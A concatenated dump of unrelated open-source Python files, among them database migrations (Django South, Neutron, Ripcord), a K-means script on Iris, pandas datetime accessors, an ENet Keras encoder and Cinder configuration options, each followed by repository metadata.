'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wiki.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['wiki.Page']"}),
'permission': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wiki.revision': {
'Meta': {'ordering': "('-pub_date',)", 'object_name': 'Revision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'author_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Page']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'text': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Text']", 'null': 'True', 'blank': 'True'})
},
'wiki.text': {
'Meta': {'object_name': 'Text'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['wiki']
|
kylef/lithium
|
lithium/wiki/migrations/0001_initial.py
|
Python
|
bsd-2-clause
| 7,245 | 0.008144 |
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
"""quota_usage
Revision ID: 45f955889773
Revises: 8675309a5c4f
Create Date: 2015-04-17 08:09:37.611546
"""
# revision identifiers, used by Alembic.
revision = '45f955889773'
down_revision = '8675309a5c4f'
def upgrade():
op.create_table(
'quotausages',
sa.Column('tenant_id', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('resource', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('dirty', sa.Boolean(), nullable=False,
server_default=sql.false()),
sa.Column('in_use', sa.Integer(), nullable=False,
server_default='0'),
sa.Column('reserved', sa.Integer(), nullable=False,
server_default='0'))
|
noironetworks/neutron
|
neutron/db/migration/alembic_migrations/versions/liberty/expand/45f955889773_quota_usage.py
|
Python
|
apache-2.0
| 1,496 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 PolyBeacon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import UniqueConstraint
from ripcord.openstack.common import log as logging
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table(
'quotas', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('project_id', String(length=255)),
Column('resource', String(length=255), nullable=False),
Column('updated_at', DateTime),
UniqueConstraint(
'project_id', 'resource',
name='uniq_quotas0project_id0resource'),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
quota_class = Table(
'quota_classes', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('class_name', String(length=255)),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('resource', String(length=255)),
Column('updated_at', DateTime),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
tables = [quota, quota_class]
for table in tables:
try:
table.create()
except Exception as e:
LOG.exception(e)
meta.drop_all(tables=tables)
raise
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table('quotas', meta, autoload=True)
quota_class = Table('quota_classes', meta, autoload=True)
tables = [quota, quota_class]
for table in tables:
table.drop()
|
kickstandproject/ripcord
|
ripcord/db/sqlalchemy/migrate_repo/versions/006_add_quota_support.py
|
Python
|
apache-2.0
| 2,465 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 18 20:53:35 2017
@author: sitibanc
"""
import numpy as np
import random
from sklearn import datasets
from scipy import stats
def kmeans(sample, K, max_iter):
    N = sample.shape[0]     # N data points
    D = sample.shape[1]     # each data point has D dimensions
    C = np.zeros((K, D))    # K cluster centers
    L = np.zeros((N, 1))    # labels (which cluster each point belongs to)
    L1 = np.zeros((N, 1))   # labels recomputed after reassignment
    dist = np.zeros((N, K))
    # Randomly select the initial centers
    idx = random.sample(range(N), K)
    C = sample[idx, :]
    iteration = 0
    while iteration <= max_iter:
        for i in range(K):
            # Vectorized squared distance from every sample to center C[i]
            # np.tile() repeats C[i, :] N times vertically, once horizontally
            dist[:, i] = np.sum((sample - np.tile(C[i, :], (N, 1))) ** 2, 1)
        # Assign each sample the label of its nearest center
        L1 = np.argmin(dist, 1)
        # Stop once the cluster memberships no longer change (converged)
        if iteration > 0 and np.array_equal(L, L1):
            break
        # Update label L
        L = L1
        # Recompute the new centers after reassignment
        for i in range(K):
            # Indices of the samples belonging to cluster i
            idx = np.nonzero(L == i)[0]  # np.nonzero() selects the True positions
            if len(idx) > 0:
                C[i, :] = np.mean(sample[idx, :], 0)  # mean along axis 0 (vertical)
        iteration += 1
    # Calculate wicd (within-cluster distance: the total distance from each
    # sample to its cluster center)
    wicd = np.sum(np.sqrt(np.sum((sample - C[L, :]) ** 2, 1)))
return C, L, wicd
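# Note: wicd typically shrinks as K grows, so comparing runs over several K
# values is one way to choose K (the classic elbow heuristic), e.g.:
#     for k in (2, 3, 4, 5):
#         _, _, w = kmeans(X, k, 1000)   # X: any (N, D) feature matrix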
# Practice 3 : Iris Dataset Clustering Using K-Means
data = datasets.load_iris()
feature = data.data
center, label, wicd = kmeans(feature, 3, 1000)
# Calculate Error Rate
error = 0
for i in range(len(label)):
if i < 50:
mode = stats.mode(label[:50])
if label[i] != mode[0][0]:
error += 1
elif i < 100:
mode = stats.mode(label[50:100])
if label[i] != mode[0][0]:
error += 1
else:
mode = stats.mode(label[100:])
if label[i] != mode[0][0]:
error += 1
print('Error rate :', error / len(label))
|
SitiBanc/1061_NCTU_IOMDS
|
1018/Course Material/1018_2.py
|
Python
|
apache-2.0
| 2,416 | 0.003714 |
from .taxii.exceptions import UnauthorizedStatus
class UnauthorizedException(UnauthorizedStatus):
pass
class InvalidAuthHeader(Exception):
pass
|
Intelworks/OpenTAXII
|
opentaxii/exceptions.py
|
Python
|
bsd-3-clause
| 157 | 0 |
from magpie.utils import get_logger
LOGGER = get_logger(__name__)
def includeme(config):
LOGGER.info("Adding API routes...")
    # Add all the API routes
config.include("magpie.api.home")
config.include("magpie.api.login")
config.include("magpie.api.management")
config.include("magpie.api.swagger")
|
Ouranosinc/Magpie
|
magpie/api/__init__.py
|
Python
|
apache-2.0
| 329 | 0 |
class User:
def __init__(self, name):
self.name = name
|
syncloud/platform
|
src/syncloud_platform/rest/model/user.py
|
Python
|
gpl-3.0
| 67 | 0 |
"""
datetimelike delegation
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer_dtype,
is_list_like,
is_period_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.accessor import (
PandasDelegate,
delegate_names,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
)
from pandas.core.base import (
NoNewAttributesMixin,
PandasObject,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
if TYPE_CHECKING:
from pandas import Series
class Properties(PandasDelegate, PandasObject, NoNewAttributesMixin):
_hidden_attrs = PandasObject._hidden_attrs | {
"orig",
"name",
}
def __init__(self, data: Series, orig):
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
self._parent = data
self.orig = orig
self.name = getattr(data, "name", None)
self._freeze()
def _get_values(self):
data = self._parent
if is_datetime64_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaIndex(data, copy=False, name=self.name)
elif is_period_dtype(data.dtype):
return PeriodArray(data, copy=False)
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
def _delegate_property_get(self, name):
from pandas import Series
values = self._get_values()
result = getattr(values, name)
# maybe need to upcast (ints)
if isinstance(result, np.ndarray):
if is_integer_dtype(result):
result = result.astype("int64")
elif not is_list_like(result):
return result
result = np.asarray(result)
if self.orig is not None:
index = self.orig.index
else:
index = self._parent.index
# return the result as a Series, which is by definition a copy
result = Series(result, index=index, name=self.name).__finalize__(self._parent)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a property of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
def _delegate_property_set(self, name, value, *args, **kwargs):
raise ValueError(
"modifications to a property of a datetimelike object are not supported. "
"Change values on the original."
)
def _delegate_method(self, name, *args, **kwargs):
from pandas import Series
values = self._get_values()
method = getattr(values, name)
result = method(*args, **kwargs)
if not is_list_like(result):
return result
result = Series(result, index=self._parent.index, name=self.name).__finalize__(
self._parent
)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a method of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_methods, typ="method"
)
class DatetimeProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Examples
--------
>>> seconds_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="s"))
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
dtype: datetime64[ns]
>>> seconds_series.dt.second
0 0
1 1
2 2
dtype: int64
>>> hours_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="h"))
>>> hours_series
0 2000-01-01 00:00:00
1 2000-01-01 01:00:00
2 2000-01-01 02:00:00
dtype: datetime64[ns]
>>> hours_series.dt.hour
0 0
1 1
2 2
dtype: int64
>>> quarters_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="q"))
>>> quarters_series
0 2000-03-31
1 2000-06-30
2 2000-09-30
dtype: datetime64[ns]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
dtype: int64
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
"""
def to_pydatetime(self) -> np.ndarray:
"""
Return the data as an array of native Python datetime objects.
Timezone information is retained if present.
.. warning::
Python's datetime uses microsecond resolution, which is lower than
pandas (nanosecond). The values are truncated.
Returns
-------
numpy.ndarray
Object dtype array containing native Python datetime objects.
See Also
--------
datetime.datetime : Standard library value for a datetime.
Examples
--------
>>> s = pd.Series(pd.date_range('20180310', periods=2))
>>> s
0 2018-03-10
1 2018-03-11
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 11, 0, 0)], dtype=object)
pandas' nanosecond precision is truncated to microseconds.
>>> s = pd.Series(pd.date_range('20180310', periods=2, freq='ns'))
>>> s
0 2018-03-10 00:00:00.000000000
1 2018-03-10 00:00:00.000000001
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 10, 0, 0)], dtype=object)
"""
return self._get_values().to_pydatetime()
@property
def freq(self):
return self._get_values().inferred_freq
def isocalendar(self):
"""
Returns a DataFrame with the year, week, and day calculated according to
the ISO 8601 standard.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
with columns year, week and day
See Also
--------
Timestamp.isocalendar : Function return a 3-tuple containing ISO year,
week number, and weekday for the given Timestamp object.
datetime.date.isocalendar : Return a named tuple object with
three components: year, week and weekday.
Examples
--------
>>> ser = pd.to_datetime(pd.Series(["2010-01-01", pd.NaT]))
>>> ser.dt.isocalendar()
year week day
0 2009 53 5
1 <NA> <NA> <NA>
>>> ser.dt.isocalendar().week
0 53
1 <NA>
Name: week, dtype: UInt32
"""
return self._get_values().isocalendar().set_index(self._parent.index)
@property
def weekofyear(self):
"""
The week ordinal of the year.
.. deprecated:: 1.1.0
Series.dt.weekofyear and Series.dt.week have been deprecated.
Please use Series.dt.isocalendar().week instead.
"""
warnings.warn(
"Series.dt.weekofyear and Series.dt.week have been deprecated. "
"Please use Series.dt.isocalendar().week instead.",
FutureWarning,
stacklevel=2,
)
week_series = self.isocalendar().week
week_series.name = self.name
if week_series.hasnans:
return week_series.astype("float64")
return week_series.astype("int64")
week = weekofyear
@delegate_names(
delegate=TimedeltaArray, accessors=TimedeltaArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=TimedeltaArray,
accessors=TimedeltaArray._datetimelike_methods,
typ="method",
)
class TimedeltaProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
Examples
--------
>>> seconds_series = pd.Series(
... pd.timedelta_range(start="1 second", periods=3, freq="S")
... )
>>> seconds_series
0 0 days 00:00:01
1 0 days 00:00:02
2 0 days 00:00:03
dtype: timedelta64[ns]
>>> seconds_series.dt.seconds
0 1
1 2
2 3
dtype: int64
"""
def to_pytimedelta(self) -> np.ndarray:
"""
Return an array of native `datetime.timedelta` objects.
        Python's standard `datetime` library uses a different representation
        for timedeltas. This method converts a Series of pandas Timedeltas
to `datetime.timedelta` format with the same length as the original
Series.
Returns
-------
numpy.ndarray
Array of 1D containing data with `datetime.timedelta` type.
See Also
--------
datetime.timedelta : A duration expressing the difference
between two date, time, or datetime.
Examples
--------
>>> s = pd.Series(pd.to_timedelta(np.arange(5), unit="d"))
>>> s
0 0 days
1 1 days
2 2 days
3 3 days
4 4 days
dtype: timedelta64[ns]
>>> s.dt.to_pytimedelta()
array([datetime.timedelta(0), datetime.timedelta(days=1),
datetime.timedelta(days=2), datetime.timedelta(days=3),
datetime.timedelta(days=4)], dtype=object)
"""
return self._get_values().to_pytimedelta()
@property
def components(self):
"""
Return a Dataframe of the components of the Timedeltas.
Returns
-------
DataFrame
Examples
--------
>>> s = pd.Series(pd.to_timedelta(np.arange(5), unit='s'))
>>> s
0 0 days 00:00:00
1 0 days 00:00:01
2 0 days 00:00:02
3 0 days 00:00:03
4 0 days 00:00:04
dtype: timedelta64[ns]
>>> s.dt.components
days hours minutes seconds milliseconds microseconds nanoseconds
0 0 0 0 0 0 0 0
1 0 0 0 1 0 0 0
2 0 0 0 2 0 0 0
3 0 0 0 3 0 0 0
4 0 0 0 4 0 0 0
"""
return (
self._get_values()
.components.set_index(self._parent.index)
.__finalize__(self._parent)
)
@property
def freq(self):
return self._get_values().inferred_freq
@delegate_names(
delegate=PeriodArray, accessors=PeriodArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=PeriodArray, accessors=PeriodArray._datetimelike_methods, typ="method"
)
class PeriodProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
Examples
--------
>>> seconds_series = pd.Series(
... pd.period_range(
... start="2000-01-01 00:00:00", end="2000-01-01 00:00:03", freq="s"
... )
... )
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
3 2000-01-01 00:00:03
dtype: period[S]
>>> seconds_series.dt.second
0 0
1 1
2 2
3 3
dtype: int64
>>> hours_series = pd.Series(
... pd.period_range(start="2000-01-01 00:00", end="2000-01-01 03:00", freq="h")
... )
>>> hours_series
0 2000-01-01 00:00
1 2000-01-01 01:00
2 2000-01-01 02:00
3 2000-01-01 03:00
dtype: period[H]
>>> hours_series.dt.hour
0 0
1 1
2 2
3 3
dtype: int64
>>> quarters_series = pd.Series(
... pd.period_range(start="2000-01-01", end="2000-12-31", freq="Q-DEC")
... )
>>> quarters_series
0 2000Q1
1 2000Q2
2 2000Q3
3 2000Q4
dtype: period[Q-DEC]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
3 4
dtype: int64
"""
class CombinedDatetimelikeProperties(
DatetimeProperties, TimedeltaProperties, PeriodProperties
):
def __new__(cls, data: Series):
# CombinedDatetimelikeProperties isn't really instantiated. Instead
# we need to choose which parent (datetime or timedelta) is
# appropriate. Since we're checking the dtypes anyway, we'll just
# do all the validation here.
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
orig = data if is_categorical_dtype(data.dtype) else None
if orig is not None:
data = data._constructor(
orig.array,
name=orig.name,
copy=False,
dtype=orig._values.categories.dtype,
index=orig.index,
)
if is_datetime64_dtype(data.dtype):
return DatetimeProperties(data, orig)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeProperties(data, orig)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaProperties(data, orig)
elif is_period_dtype(data.dtype):
return PeriodProperties(data, orig)
raise AttributeError("Can only use .dt accessor with datetimelike values")
|
dsm054/pandas
|
pandas/core/indexes/accessors.py
|
Python
|
bsd-3-clause
| 14,627 | 0.001641 |
# coding=utf-8
from keras.layers.advanced_activations import PReLU
from keras.layers.convolutional import Conv2D, ZeroPadding2D
from keras.layers.core import SpatialDropout2D, Permute
from keras.layers.merge import add, concatenate
from keras.layers.normalization import BatchNormalization
from ..layers.pooling import MaxPoolingWithArgmax2D
def initial_block(inp, nb_filter=13, nb_row=3, nb_col=3, strides=(2, 2)):
conv = Conv2D(nb_filter, (nb_row, nb_col), padding='same', strides=strides)(inp)
max_pool, indices = MaxPoolingWithArgmax2D()(inp)
merged = concatenate([conv, max_pool], axis=3)
return merged, indices
def bottleneck(inp, output, internal_scale=4, asymmetric=0, dilated=0, downsample=False, dropout_rate=0.1):
# main branch
internal = output // internal_scale
encoder = inp
# 1x1
input_stride = 2 if downsample else 1 # the 1st 1x1 projection is replaced with a 2x2 convolution when downsampling
encoder = Conv2D(internal, (input_stride, input_stride),
# padding='same',
strides=(input_stride, input_stride), use_bias=False)(encoder)
# Batch normalization + PReLU
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# conv
if not asymmetric and not dilated:
encoder = Conv2D(internal, (3, 3), padding='same')(encoder)
elif asymmetric:
encoder = Conv2D(internal, (1, asymmetric), padding='same', use_bias=False)(encoder)
encoder = Conv2D(internal, (asymmetric, 1), padding='same')(encoder)
elif dilated:
encoder = Conv2D(internal, (3, 3), dilation_rate=(dilated, dilated), padding='same')(encoder)
else:
raise(Exception('You shouldn\'t be here'))
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# 1x1
encoder = Conv2D(output, (1, 1), use_bias=False)(encoder)
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = SpatialDropout2D(dropout_rate)(encoder)
other = inp
# other branch
if downsample:
other, indices = MaxPoolingWithArgmax2D()(other)
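        # ZeroPadding2D only pads spatial axes, so the channel axis is swapped
        # into a spatial position, zero-padded up to `output` feature maps,
        # then swapped back.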
other = Permute((1, 3, 2))(other)
pad_feature_maps = output - inp.get_shape().as_list()[3]
tb_pad = (0, 0)
lr_pad = (0, pad_feature_maps)
other = ZeroPadding2D(padding=(tb_pad, lr_pad))(other)
other = Permute((1, 3, 2))(other)
encoder = add([encoder, other])
encoder = PReLU(shared_axes=[1, 2])(encoder)
if downsample:
return encoder, indices
else:
return encoder
def build(inp, dropout_rate=0.01):
pooling_indices = []
enet, indices_single = initial_block(inp)
enet = BatchNormalization(momentum=0.1)(enet) # enet_unpooling uses momentum of 0.1, keras default is 0.99
enet = PReLU(shared_axes=[1, 2])(enet)
pooling_indices.append(indices_single)
enet, indices_single = bottleneck(enet, 64, downsample=True, dropout_rate=dropout_rate) # bottleneck 1.0
pooling_indices.append(indices_single)
for _ in range(4):
enet = bottleneck(enet, 64, dropout_rate=dropout_rate) # bottleneck 1.i
enet, indices_single = bottleneck(enet, 128, downsample=True) # bottleneck 2.0
pooling_indices.append(indices_single)
# bottleneck 2.x and 3.x
for _ in range(2):
enet = bottleneck(enet, 128) # bottleneck 2.1
enet = bottleneck(enet, 128, dilated=2) # bottleneck 2.2
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.3
enet = bottleneck(enet, 128, dilated=4) # bottleneck 2.4
enet = bottleneck(enet, 128) # bottleneck 2.5
enet = bottleneck(enet, 128, dilated=8) # bottleneck 2.6
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.7
enet = bottleneck(enet, 128, dilated=16) # bottleneck 2.8
return enet, pooling_indices
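# A minimal usage sketch (assumed, not part of the original file):
#
#     from keras.layers import Input
#     inp = Input(shape=(512, 512, 3))
#     enet, pooling_indices = build(inp, dropout_rate=0.01)
#
# The returned pooling_indices feed a matching unpooling decoder, which is why
# MaxPoolingWithArgmax2D is used here instead of plain max pooling.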
|
PavlosMelissinos/enet-keras
|
src/models/enet_unpooling/encoder.py
|
Python
|
mit
| 4,098 | 0.00366 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 NTT corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Command-line flag library.
Emulates gflags by wrapping cfg.ConfigOpts.
The idea is to move fully to cfg eventually, and this wrapper is a
stepping stone.
"""
import socket
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import netutils
from cinder.i18n import _
CONF = cfg.CONF
logging.register_options(CONF)
core_opts = [
cfg.StrOpt('api_paste_config',
default="api-paste.ini",
help='File name for the paste.deploy config for cinder-api'),
cfg.StrOpt('state_path',
default='/var/lib/cinder',
deprecated_name='pybasedir',
help="Top-level directory for maintaining cinder's state"), ]
debug_opts = [
]
CONF.register_cli_opts(core_opts)
CONF.register_cli_opts(debug_opts)
global_opts = [
cfg.StrOpt('my_ip',
default=netutils.get_my_ipv4(),
help='IP address of this host'),
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance host name or IP'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port'),
cfg.ListOpt('glance_api_servers',
default=['$glance_host:$glance_port'],
help='A list of the glance API servers available to cinder '
'([hostname|ip]:port)'),
cfg.IntOpt('glance_api_version',
default=1,
help='Version of the glance API to use'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number retries when downloading an image from glance'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance'),
cfg.BoolOpt('glance_api_ssl_compression',
default=False,
help='Enables or disables negotiation of SSL layer '
'compression. In some cases disabling compression '
'can improve data throughput, such as when high '
'network bandwidth is available and you use '
'compressed image formats like qcow2.'),
cfg.StrOpt('glance_ca_certificates_file',
help='Location of ca certificates file to use for glance '
'client requests.'),
cfg.IntOpt('glance_request_timeout',
default=None,
help='http/https timeout value for glance operations. If no '
'value (None) is supplied here, the glanceclient default '
'value is used.'),
cfg.StrOpt('scheduler_topic',
default='cinder-scheduler',
help='The topic that scheduler nodes listen on'),
cfg.StrOpt('volume_topic',
default='cinder-volume',
help='The topic that volume nodes listen on'),
cfg.StrOpt('backup_topic',
default='cinder-backup',
help='The topic that volume backup nodes listen on'),
cfg.BoolOpt('enable_v1_api',
default=True,
help=_("DEPRECATED: Deploy v1 of the Cinder API.")),
cfg.BoolOpt('enable_v2_api',
default=True,
help=_("Deploy v2 of the Cinder API.")),
cfg.BoolOpt('api_rate_limit',
default=True,
help='Enables or disables rate limit of the API.'),
cfg.ListOpt('osapi_volume_ext_list',
default=[],
help='Specify list of extensions to load when using osapi_'
'volume_extension option with cinder.api.contrib.'
'select_extensions'),
cfg.MultiStrOpt('osapi_volume_extension',
default=['cinder.api.contrib.standard_extensions'],
help='osapi volume extension to load'),
cfg.StrOpt('volume_manager',
default='cinder.volume.manager.VolumeManager',
help='Full class name for the Manager for volume'),
cfg.StrOpt('backup_manager',
default='cinder.backup.manager.BackupManager',
help='Full class name for the Manager for volume backup'),
cfg.StrOpt('scheduler_manager',
default='cinder.scheduler.manager.SchedulerManager',
help='Full class name for the Manager for scheduler'),
cfg.StrOpt('host',
default=socket.gethostname(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a host name, FQDN, or IP address.'),
# NOTE(vish): default to nova for compatibility with nova installs
cfg.StrOpt('storage_availability_zone',
default='nova',
help='Availability zone of this node'),
cfg.StrOpt('default_availability_zone',
default=None,
help='Default availability zone for new volumes. If not set, '
'the storage_availability_zone option value is used as '
'the default for new volumes.'),
cfg.StrOpt('default_volume_type',
default=None,
help='Default volume type to use'),
cfg.StrOpt('volume_usage_audit_period',
default='month',
help='Time period for which to generate volume usages. '
'The options are hour, day, month, or year.'),
cfg.StrOpt('rootwrap_config',
default='/etc/cinder/rootwrap.conf',
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.BoolOpt('monkey_patch',
default=False,
help='Enable monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[],
help='List of modules/decorators to monkey patch'),
cfg.IntOpt('service_down_time',
default=60,
help='Maximum time since last check-in for a service to be '
'considered up'),
cfg.StrOpt('volume_api_class',
default='cinder.volume.api.API',
help='The full class name of the volume API class to use'),
cfg.StrOpt('backup_api_class',
default='cinder.backup.api.API',
help='The full class name of the volume backup API class'),
cfg.StrOpt('auth_strategy',
default='keystone',
choices=['noauth', 'keystone', 'deprecated'],
help='The strategy to use for auth. Supports noauth, keystone, '
'and deprecated.'),
cfg.ListOpt('enabled_backends',
default=None,
help='A list of backend names to use. These backend names '
'should be backed by a unique [CONFIG] group '
'with its options'),
cfg.BoolOpt('no_snapshot_gb_quota',
default=False,
help='Whether snapshots count against gigabyte quota'),
cfg.StrOpt('transfer_api_class',
default='cinder.transfer.api.API',
help='The full class name of the volume transfer API class'),
cfg.StrOpt('replication_api_class',
default='cinder.replication.api.API',
help='The full class name of the volume replication API class'),
cfg.StrOpt('consistencygroup_api_class',
default='cinder.consistencygroup.api.API',
help='The full class name of the consistencygroup API class'),
cfg.StrOpt('os_privileged_user_name',
default=None,
help='OpenStack privileged account username. Used for requests '
'to other services (such as Nova) that require an account '
'with special rights.'),
cfg.StrOpt('os_privileged_user_password',
default=None,
help='Password associated with the OpenStack privileged '
'account.',
secret=True),
cfg.StrOpt('os_privileged_user_tenant',
default=None,
help='Tenant name associated with the OpenStack privileged '
'account.'),
]
CONF.register_opts(global_opts)
